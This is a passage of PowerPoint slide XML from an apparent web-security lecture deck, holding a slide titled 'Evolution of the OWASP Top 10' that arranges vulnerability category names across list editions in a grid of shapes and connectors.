              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, esp. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="5715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rgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF99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53CE7-4652-E7EC-9436-2877552EC25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D3A9F61A-0238-41AE-BB0B-6E00DBB90FAC}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>51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7343996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9AC3D-C8A2-A158-EC0F-3E85BB8A6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: Curved 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2015CD6-332E-136F-2416-AED6F0E0AA83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163700" y="2442754"/>
            <a:ext cx="321120" cy="987840"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 40113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91" name="Connector: Curved 116">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B23DB061-2A50-1226-FFB7-56E0F1E42690}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1242" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4966560" y="4163445"/>
            <a:ext cx="179640" cy="1731375"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="92D050"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:tailEnd type="none" w="med" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1187" name="PlaceHolder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1D87902-06A4-9334-173E-BCD9FA8E6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420" y="169254"/>
            <a:ext cx="8224560" cy="80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 algn="ctr" defTabSz="446040">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C5000B"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Evolution of the OWASP Top 10</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1188" name="PlaceHolder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C97D901-4B48-0B49-9C53-73170F35683E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="73"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7884360" y="6211440"/>
            <a:ext cx="775080" cy="469440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0" algn="r" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr indent="0" algn="r" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{E01EDF43-9989-4485-A3FE-CFD0EC2751AF}" type="slidenum">
              <a:rPr lang="en-US" sz="120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52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189" name="Connector: Curved 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3AB8946-4765-1564-A9BA-46B0E68F2418}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1216" idx="3"/>
            <a:endCxn id="1195" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6251760" y="1429380"/>
            <a:ext cx="341640" cy="198468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sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1190" name="CustomShape 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12144B4C-9417-0352-8D69-CA370B54CBA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="1220040"/>
            <a:ext cx="91296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Unvalidated Input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1" name="CustomShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA9333DC-5C0E-C985-208E-F571AB66DD81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="1220040"/>
            <a:ext cx="9313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2" name="CustomShape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB617E2D-AE7A-64B1-16A2-74E9F6643720}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="1220040"/>
            <a:ext cx="9295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3" name="CustomShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{696A8F5C-513C-A4C3-52B7-FA8DB9393C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="1220040"/>
            <a:ext cx="9259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4" name="CustomShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4A59823-A37B-5E90-ACAB-BB6F773C997B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="1220040"/>
            <a:ext cx="9277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5" name="CustomShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C83B88F-E717-94D7-27E1-77ECA1567E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="1220040"/>
            <a:ext cx="924480" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
          <a:ln w="936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pc="-1" dirty="0">
                <a:latin typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>Broken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" spc="-1" dirty="0">
                <a:latin typeface="Arial Narrow"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" spc="-1" dirty="0">
                <a:latin typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" spc="-1" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1196" name="CustomShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4B1A0C3-51F1-337F-59BF-4AF7D91D6CC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226080" y="1716120"/>
            <a:ext cx="93780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dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Broken Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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7" name="CustomShape 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23FBC10D-3DE8-B36E-C3E2-080ADB276DA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="1716120"/>
            <a:ext cx="9313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8" name="CustomShape 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C29096C0-3E3F-3D57-2E17-911220BC4884}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="1714680"/>
            <a:ext cx="9295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9" name="CustomShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8018768-CF9A-4940-3DF1-2DCE66783275}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="1716120"/>
            <a:ext cx="9259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Broken Authentication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0" name="CustomShape 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8305B48-530F-05F2-706E-89A291A9D69F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="1716120"/>
            <a:ext cx="9277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Broken Auth. &amp; Session Mngt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1" name="CustomShape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6B5BA81-CC79-D47B-60E1-4C1B16C69F34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="1716120"/>
            <a:ext cx="924480" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFD8CE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Cryptographic Failures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2" name="CustomShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC9D2C5D-3396-33AA-5588-E471B07DB814}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="2212200"/>
            <a:ext cx="91296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Broken Auth. &amp; Session Mngt.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3" name="CustomShape 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16B8C7A8-86FC-8259-EEBB-FF10C58E1199}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="2212200"/>
            <a:ext cx="9313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Malicious File Execution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4" name="CustomShape 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{428041E7-9932-4292-64C0-ACAAC2B75A8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="2209320"/>
            <a:ext cx="9295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Broken Auth. &amp; Session Mngt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5" name="CustomShape 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CF15245-D5CE-50DB-E3A1-7F3298E62230}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="2212200"/>
            <a:ext cx="925920" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFD8CE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Sensitive Data Exposure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6" name="CustomShape 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9824B910-F1D2-E778-4E23-713865718F5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="2212200"/>
            <a:ext cx="9277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7" name="CustomShape 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C0AB9E3-DA58-26F7-27A9-011BAB5A999E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="2212200"/>
            <a:ext cx="92448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8" name="CustomShape 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4C56BE5-9548-0409-4275-7BDD60B654A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="2708640"/>
            <a:ext cx="91296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9" name="CustomShape 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{246A5B4F-54B4-723E-1BB7-2213EFAC72B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485000" y="2703960"/>
            <a:ext cx="9313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0" name="CustomShape 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6317B779-4086-394C-7A37-0B48618B6779}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="2703960"/>
            <a:ext cx="9295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1" name="CustomShape 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCC88D83-212C-8251-0484-D2B60CAB685E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="2708640"/>
            <a:ext cx="9277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2" name="CustomShape 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3308BED6-46B2-C4ED-7AE8-2675F57174C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="2708640"/>
            <a:ext cx="924480" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:srgbClr val="92D050"/>
            </a:fgClr>
            <a:bgClr>
              <a:srgbClr val="FFE575"/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Insecure </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1000"/>
            </a:b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Design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3" name="CustomShape 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B830284-6661-16F5-FF47-42DF152037C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239400" y="3204720"/>
            <a:ext cx="9115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Buffer Overflows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4" name="CustomShape 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8246D54-8252-A6B4-0D15-E79A4E4FC8EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="3204720"/>
            <a:ext cx="9313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5" name="CustomShape 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECD0F4FD-EA2C-7EF8-0B80-F072307836D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="3198600"/>
            <a:ext cx="9295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dk1"/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6" name="CustomShape 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB1A7224-3F22-F114-22B1-DED43C5ED742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="3204720"/>
            <a:ext cx="9259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Broken Access Control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7" name="CustomShape 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7613C8A-EDF2-B787-2751-2D7BF679BBCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="3700800"/>
            <a:ext cx="91296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8" name="CustomShape 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F418D1-AA90-FDF9-C46D-E2821BC1A565}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485720" y="3700800"/>
            <a:ext cx="930600" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF7B5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Info Leakage &amp; Improper Error Handling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9" name="CustomShape 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29EF36F3-4698-C65C-C670-857ED3BE79AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="369324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Security Misconfig.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0" name="CustomShape 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91FBC8B2-CC78-EE59-585D-1C56CC39C16C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="3700800"/>
            <a:ext cx="927720" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFD8CE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Sensitive Data Exposure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1" name="CustomShape 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC7A389-581F-CEFC-31C4-66F91CF49977}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="3700800"/>
            <a:ext cx="924480" cy="4186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Vulnerable &amp; outdated components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2" name="CustomShape 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DCF7C2C-4AA0-D01D-C019-5A8D6EDD2796}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216360" y="4196880"/>
            <a:ext cx="957240" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF7B5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Improper Error Handling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3" name="CustomShape 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50C9BEF5-AAA1-2D8C-7520-106D0B5C4D20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="4196880"/>
            <a:ext cx="9313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Broken Auth. &amp; Session Mngt.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4" name="CustomShape 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9932BF5-CCA8-24E0-9305-E133FAFF7E97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2766240" y="4187880"/>
            <a:ext cx="929160" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFD8CE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Insecure Cryptographic Storage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5" name="CustomShape 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{264E15D5-36FC-0939-23E8-1E6C7F4D5F32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="4196880"/>
            <a:ext cx="9259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6" name="CustomShape 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73271523-1495-26DF-3FC0-46859606414D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="4196880"/>
            <a:ext cx="9277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Missing function level access control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7" name="CustomShape 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38CE73D6-5D6E-1470-3CEF-55543AC6474A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="4196880"/>
            <a:ext cx="92448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Identification &amp; Authentication Failures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8" name="CustomShape 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E501DE84-CEE7-F9F4-DEAF-BB857D8AC417}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="4693320"/>
            <a:ext cx="912960" cy="418680"/>
          </a:xfrm>
